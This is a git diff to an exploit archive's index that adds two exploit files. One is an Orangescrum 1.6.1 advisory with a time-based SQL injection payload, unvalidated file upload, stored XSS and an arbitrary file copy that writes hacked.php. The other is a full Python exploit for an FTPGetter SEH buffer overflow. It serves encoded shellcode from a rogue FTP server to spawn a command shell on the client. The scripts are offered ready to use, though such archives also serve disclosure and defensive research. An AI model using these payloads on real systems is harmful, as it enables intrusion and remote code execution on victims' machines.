diff --git a/files.csv b/files.csv index 992dcebfe..7ed0f9397 100644 --- a/files.csv +++ b/files.csv @@ -15695,6 +15695,7 @@ id,file,description,date,author,platform,type,port 42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0 +42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -38138,3 +38139,4 @@ id,file,description,date,author,platform,type,port 42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0 42324,platforms/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps,0 42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0 +42330,platforms/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,php,webapps,0 diff --git a/platforms/php/webapps/42330.txt b/platforms/php/webapps/42330.txt new file mode 100755 index 000000000..b0f0fe18b --- /dev/null +++ b/platforms/php/webapps/42330.txt @@ -0,0 +1,39 @@ +# Exploit Title: [Orangescrum 1.6.1 Multiple Vulnerabilities] +# Google Dork: [NA] +# Date: [July 9 2017] +# Exploit Author: [tomplixsee@yahoo.co.id] +# Author blog : [cupuzone.wordpress.com] +# Vendor Homepage: [https://www.orangescrum.org/] +# Software Link: [https://www.orangescrum.org/free-download] +# Version: [1.6.1] +# Tested on: [Ubuntu 16.04] +# CVE : [NA] + +Orangescrum is one of task management software written in PHP. + +Its version 1.6.1 have multiple vulnerabilities. To exploit all of them, you have to log in first. + +1. Arbitrary File Upload +Create or reply task. Then upload a file. The file will be uploaded into directory app/webroot/files/case_files, without any validation. +It then can be accessed from url http://yourorangescrum/app/webroot/files/case_files/thefile + +2. SQL Injection (time based) +Send a POST request to http://yourorangescrum/easycases/ajax_change_AssignTo , with POST variables caseId and assignId. +For example in python: +url = "http://yourorangescrum/easycases/ajax_change_AssignTo" +data = {"caseId":"1' AND SLEEP(5) AND 1='1","assignId":"1"} +headers = { + 'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept': 'application/json, text/javascript, */*; q=0.01', + 'Cookie': yourcookie +} + +3. XSS (stored) +Reply a task (choose html editor). Put your XSS code there. example + +4. Arbitrary File Copy +Look at an image profile url, it is something like this http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=94&sizey=94&quality=100 +To copy add variable dest, so it will be like this http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=94&sizey=94&quality=100&dest=hacked.php +It will copy file a6ebd6bd62ba537f37b7b8ac40aa626d.png into hacked.php that will be stored in users/image_thumb/hacked.php +Conditions : +- variable sizex and sizey must be the real width and height of file a6ebd6bd62ba537f37b7b8ac40aa626d.png (in this example) diff --git a/platforms/windows/remote/42328.py b/platforms/windows/remote/42328.py new file mode 100755 index 000000000..f5972b4ab --- /dev/null +++ b/platforms/windows/remote/42328.py @@ -0,0 +1,101 @@ +#!/usr/bin/python + +# Exploit Title: FTPGetter 5.89.0.85 Remote SEH Buffer Overflow +# Date: 07/14/2017 +# Exploit Author: Paul Purcell +# Contact: ptpxploit at gmail +# Vendor Homepage: https://www.ftpgetter.com/ +# Vulnerable Version Download: Available for 30 days here: (https://ufile.io/2celn) I can upload again upon request +# Version: FTPGetter 5.89.0.85 (also works on earlier versions) +# Tested on: Windows 10 Pro 1703 x64 +# Youtube Demonstration of Exploit: https://www.youtube.com/watch?v=AuAiQwGP-ww +# Category: Remote Code Execution +# +# Timeline: 05/25/16 Bug found +# 05/31/16 Vender notified - no response +# 07/15/16 Vender notified - no response +# -------- Vender notified multiple times over a year, no response. +# 07/14/17 Exploit Published +# +# Summary: There is a buffer overflow in the log viewer/parser of FTPGetter. When a malicious ftp server returns a long +# 331 response, the overflow overwrites SEH produced is exploitable. There are many bad characters, so I had to ascii encode everything. +# My PoC runs code to launch a command shell. Also note the time of day is displayed in the log viewer, which will +# change the length of the buffer needed. Just adjust your sled accordingly. + +from socket import * + +#ascii encoded launch cmd.exe +buf = "" +buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x4b\x4c\x6b\x58\x4f\x72\x67\x70\x43\x30\x55\x50\x33" +buf += "\x50\x4f\x79\x4a\x45\x44\x71\x4f\x30\x71\x74\x6c\x4b" +buf += "\x70\x50\x34\x70\x4e\x6b\x61\x42\x54\x4c\x4c\x4b\x42" +buf += "\x72\x47\x64\x4e\x6b\x64\x32\x44\x68\x36\x6f\x4c\x77" +buf += "\x42\x6a\x46\x46\x30\x31\x4b\x4f\x4c\x6c\x57\x4c\x31" +buf += "\x71\x63\x4c\x44\x42\x64\x6c\x35\x70\x7a\x61\x38\x4f" +buf += "\x56\x6d\x55\x51\x6f\x37\x38\x62\x4c\x32\x61\x42\x52" +buf += "\x77\x4c\x4b\x51\x42\x32\x30\x6e\x6b\x50\x4a\x77\x4c" +buf += "\x4e\x6b\x42\x6c\x34\x51\x44\x38\x68\x63\x32\x68\x66" +buf += "\x61\x58\x51\x62\x71\x6c\x4b\x76\x39\x35\x70\x35\x51" +buf += "\x49\x43\x4e\x6b\x37\x39\x67\x68\x68\x63\x55\x6a\x72" +buf += "\x69\x4c\x4b\x64\x74\x4e\x6b\x65\x51\x5a\x76\x35\x61" +buf += "\x69\x6f\x4c\x6c\x6b\x71\x78\x4f\x54\x4d\x57\x71\x39" +buf += "\x57\x46\x58\x79\x70\x51\x65\x4c\x36\x67\x73\x51\x6d" +buf += "\x38\x78\x67\x4b\x73\x4d\x64\x64\x32\x55\x39\x74\x56" +buf += "\x38\x4c\x4b\x62\x78\x54\x64\x37\x71\x79\x43\x75\x36" +buf += "\x4e\x6b\x46\x6c\x42\x6b\x4e\x6b\x56\x38\x47\x6c\x46" +buf += "\x61\x5a\x73\x6c\x4b\x45\x54\x4c\x4b\x33\x31\x48\x50" +buf += "\x4c\x49\x73\x74\x44\x64\x44\x64\x33\x6b\x53\x6b\x50" +buf += "\x61\x73\x69\x63\x6a\x62\x71\x59\x6f\x6b\x50\x53\x6f" +buf += "\x51\x4f\x32\x7a\x4e\x6b\x72\x32\x7a\x4b\x4e\x6d\x31" +buf += "\x4d\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x38\x32\x67\x70" +buf += "\x63\x30\x53\x30\x66\x30\x75\x38\x36\x51\x6e\x6b\x52" +buf += "\x4f\x4f\x77\x39\x6f\x4b\x65\x4d\x6b\x6a\x50\x4f\x45" +buf += "\x4f\x52\x30\x56\x42\x48\x6e\x46\x6f\x65\x6f\x4d\x6d" +buf += "\x4d\x49\x6f\x7a\x75\x45\x6c\x73\x36\x51\x6c\x37\x7a" +buf += "\x4b\x30\x39\x6b\x39\x70\x30\x75\x76\x65\x6d\x6b\x72" +buf += "\x67\x32\x33\x52\x52\x62\x4f\x51\x7a\x75\x50\x76\x33" +buf += "\x79\x6f\x4b\x65\x55\x33\x62\x4d\x72\x44\x34\x6e\x53" +buf += "\x55\x43\x48\x61\x75\x57\x70\x41\x41" + +#All the normal ways to jump back to code I control code were bad characters, so again had to ascii encode +jmpback = "" +jmpback += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +jmpback += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +jmpback += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +jmpback += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +jmpback += "\x4e\x6d\x4d\x6e\x46\x70\x49\x6e\x6b\x4f\x4b\x4f\x49" +jmpback += "\x6f\x6a\x47\x41\x41" + +host = "0.0.0.0" +port = 21 + +sled="NjoyUrShell!" +fill="\x41"*(480-len(buf)) +nseh="\x74\x06\x90\x90" +seh="\xad\x11\x4d\x00" +prepesi="\x58\x58\x58\x8d\x70\x10\x90\x90" +jnk="B"*400 +sploit=(sled+buf+fill+nseh+seh+prepesi+jmpback+jnk) +sock = socket(AF_INET, SOCK_STREAM) +sock.bind((host, 21)) +sock.listen(1) + + +print "Anti-FtpGetter FTP Server Started!" +print "Ready to pwn on port %d..." % port + +connect, hostip = sock.accept() +print "Connection accepted from %s" % hostip[0] +connect.send("220 Welcome to pwnServ, Serving sploit in 3..2..1..\r\n") +connect.recv(64) # Receive USER +print "Sending EViL 331 response" +connect.send("331 "+sploit+"\r\n") +print "Here, have a handy dandy command shell!" +connect.close() +sock.close() + +